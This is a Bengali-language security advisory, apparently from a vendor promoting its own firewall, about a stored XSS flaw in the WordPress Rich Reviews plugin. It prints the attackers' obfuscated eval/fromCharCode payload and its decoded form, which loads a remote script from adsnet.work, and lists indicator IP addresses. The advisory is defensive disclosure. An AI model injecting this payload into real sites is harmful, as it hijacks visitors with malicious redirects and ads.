রিচ রিভিউ প্লাগইনের মধ্যে একটি গুরুতর XSS দুর্বলতা উন্মোচিত হয়েছে। একটি অনুমানে বলা হয়েছে যে রিচ রিভিউ প্লাগইনটিতে 16,000 টিরও বেশি সক্রিয় ডাউনলোড রয়েছে৷ যদিও সমালোচনামূলক, দুর্বলতার আবিষ্কার আশ্চর্যজনক নয়, কারণ প্লাগইনটি দুই বছরের বেশি সময় ধরে আপডেট করা হয়নি।
প্রকৃতপক্ষে, 11শে মার্চ, 2019-এ ছয় মাস আগে ওয়ার্ডপ্রেস প্লাগইন ডিরেক্টরি থেকে রিচ রিভিউগুলি সরিয়ে দেওয়া হয়েছে। আরও, প্রভাবিত সংস্করণগুলি হল 1.7.4 এবং তার আগে . আশ্চর্যজনকভাবে, এখন পর্যন্ত কোনও প্যাচ রিলিজের খবর নেই৷
৷
রিচ রিভিউ দুর্বলতার বিবরণ
দুর্বলতা একটি সংরক্ষিত XSS হিসাবে চিহ্নিত করা হয়েছে. এই কারণে, যে কোনো অননুমোদিত ব্যবহারকারী প্লাগইন ইনস্টল থাকা যেকোনো ওয়ার্ডপ্রেস সাইটে প্লাগইন বিকল্প আপডেটের সুবিধা নিতে পারে।
এখন পর্যন্ত, অপব্যবহার আকারে শোষণ আলোতে এসেছে। হ্যাকাররা ওয়েবসাইটগুলিতে দূষিত কোডগুলি ইনজেক্ট করার জন্য দুর্বলতা ব্যবহার করছে, যা হয় একটি পপ-আপ বা একটি ক্ষতিকর বিজ্ঞাপনকে ট্রিগার করে৷ এই বিজ্ঞাপনগুলি এবং পপ-আপগুলি, আরও, আপত্তিকর এবং অশ্লীল সাইটগুলিতে পুনঃনির্দেশিত করে৷
প্রযুক্তিগত বিবরণ
আক্রমণের প্রধান অপরাধী হল প্লাগইনে অ্যাক্সেস নিয়ন্ত্রণের অভাব। তা ছাড়াও, স্যানিটাইজেশনের নিয়মগুলিও অনুচিত।
দূষিত কোডগুলি যেগুলি পুনঃনির্দেশিত বিজ্ঞাপন এবং পপ-আপগুলিকে ট্রিগার করে তা নীচে চিত্রিত করা হয়েছে৷ লক্ষ্য করুন যে হ্যাকার সনাক্তকরণ এড়ানোর জন্য কোডটি বুদ্ধিমানের সাথে অস্পষ্ট করেছে৷
eval(String.fromCharCode(118, 97, 114, 32, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 10, 115, 99, 114, 105, 112, 116, 46, 111, 110, 108, 111, 97, 100, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 125, 59, 10, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 97, 100, 115, 110, 101, 116, 46, 119, 111, 114, 107, 47, 115, 99, 114, 105, 112, 116, 115, 47, 112, 108, 97, 99, 101, 46, 106, 115, 34, 59, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 99, 114, 105, 112, 116, 41, 59));
উপরের কোডটি deobfuscating এ কনভার্ট করে:
var script = document.createElement('script');
script.onload = function() {
};
script.src = "https://adsnet.work/scripts/place.js";
document.getElementsByTagName('head')[0].appendChild(script);
হ্যাকার সনাক্ত করা হয়েছে
নিম্নলিখিত আইপি ঠিকানাগুলির বেশিরভাগ আক্রমণের সাথে লিঙ্ক রয়েছে:
- 94.229.170.38
- 183.90.250.26
- 69.27.116.3
এছাড়াও, একটি ডোমেন নামও চিহ্নিত করা হয়েছে। এটি adsnet.work দ্বারা চলে . এই আইপি থেকে যেকোনো লগইন প্রচেষ্টা থেকে সতর্ক থাকুন। তাদের আগে থেকে আপনার ওয়েবসাইটে পৌঁছানো থেকে ব্লক করা একটি ভাল সমাধান হবে।
সংক্রমণ সরান
আপনি যদি আক্রমণের দুর্ভাগ্যজনক শিকার হয়ে থাকেন তবে আতঙ্কিত হবেন না। Astra নিরাপত্তা বিশেষজ্ঞদের সাথে যোগাযোগ করুন, এবং আমরা আপনার জন্য সবকিছু ঠিক করে দেব যাতে আপনি সহজে শ্বাস নিতে পারেন।
ঝুঁকি কমানোর কৌশল
যারা এখনও সংক্রামিত হয়নি তাদের সময় থাকতে সতর্কতা অবলম্বন করা উচিত। সংক্রমণ যাতে আপনার কাছে না পৌঁছাতে পারে তার জন্য এখানে কয়েকটি জিনিস আপনি করতে পারেন।
প্লাগইন সরান
যেহেতু প্লাগইনটি WP ডিরেক্টরি থেকে প্রত্যাহার করা হয়েছে, তাই বিকাশকারী আপডেট হওয়া সংস্করণটি বিতরণ করতে পারে এমন কোন উপায় নেই। আমরা পরামর্শ দিচ্ছি যে আপনি নিরাপত্তা নিশ্চিত করতে একবারে প্লাগইনটি সরিয়ে ফেলুন। এছাড়াও, বিকাশকারী শীঘ্রই যেকোনও সময় একটি প্যাচ প্রকাশ করার কোনো ইচ্ছা দেখায়নি৷
৷ফায়ারওয়াল দিয়ে সুরক্ষিত করুন
আপনি প্লাগইন মুছে ফেলার পরে, অনুরূপ আক্রমণ থেকে রক্ষা করার জন্য একটি ফায়ারওয়াল ব্যবহার করুন। Astra ফায়ারওয়াল ওয়ার্ডপ্রেসের জন্য একটি দক্ষ বিকল্প। এটি XSS, CSRF, SQLi, খারাপ বট, LFI, RFI, OWASP শীর্ষ 10 এবং 100+ অন্যান্য সাইবার আক্রমণকে আপনার ওয়েবসাইটকে প্রভাবিত করা থেকে ব্লক করে।
আমার ওয়েবসাইট রক্ষা করতে আমাকে সাহায্য করুন৷৷
